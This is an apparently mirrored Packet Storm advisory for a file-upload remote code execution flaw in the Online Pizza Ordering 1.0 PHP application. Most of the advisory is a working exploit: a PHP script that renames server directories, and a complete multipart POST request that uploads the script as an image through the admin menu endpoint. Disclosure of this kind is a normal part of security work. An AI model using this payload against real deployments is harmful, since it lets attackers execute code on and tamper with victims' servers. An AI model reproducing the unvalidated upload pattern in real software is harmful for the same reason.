Security
Headlines
HeadlinesLatestCVEs

Headline

Online Pizza Ordering 1.0 Shell Upload

Online Pizza Ordering version 1.0 suffers from a remote shell upload vulnerability.

Packet Storm
#sql#vulnerability#web#windows#apple#git#php#auth#chrome#webkit

Title: Online-Pizza-Ordering-1.0 File-Inclusion-RCE

Author: nu11secur1ty

Date: 03.30.2023

Vendor: https://github.com/oretnom23

Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html

Reference: https://portswigger.net/web-security/file-upload

Description:

The malicious user can request an account from the administrator of
this system.
Then he can use this vulnerability to destroy or get access to all
accounts of this system, even more, worst than ever.
The malicious user can upload a very dangerous file on this server,
and he can execute it via shell.
The status is CRITICAL.

STATUS: HIGH Vulnerability

[+]Exploit:

<?php  
// by nu11secur1ty - 2023  
// Old Name Of The file  
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;

// New Name For The File  
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;

// using rename() function to rename the file  
rename( $old_name, $new_name) ;

?>

[+]Injection_REQUEST:

POST /php-opos/admin/ajax.php?action=save_menu HTTP/1.1  
Host: pwnedhost7.com  
Content-Length: 1050  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111  
Safari/537.36  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Origin: http://pwnedhost7.com  
Referer: http://pwnedhost7.com/php-opos/admin/index.php?page=menu  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=sn639s6euv91mfc9rbef4tdr1p  
Connection: close

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="id"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="name"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="description"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="status"

on  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="category_id"

4  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="price"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="img"; filename="namebasterd.php"  
Content-Type: application/octet-stream

<?php  
// by nu11secur1ty - 2023  
// Old Name Of The file  
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;

// New Name For The File  
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;

// using rename() function to rename the file  
rename( $old_name, $new_name) ;

?>

------WebKitFormBoundaryt8ceBsdqMkRKDoHX--

Reproduce:

href

Proof and Exploit:

href

Time spend:

00:45:00

Packet Storm: Latest News

WordPress Really Simple Security Authentication Bypass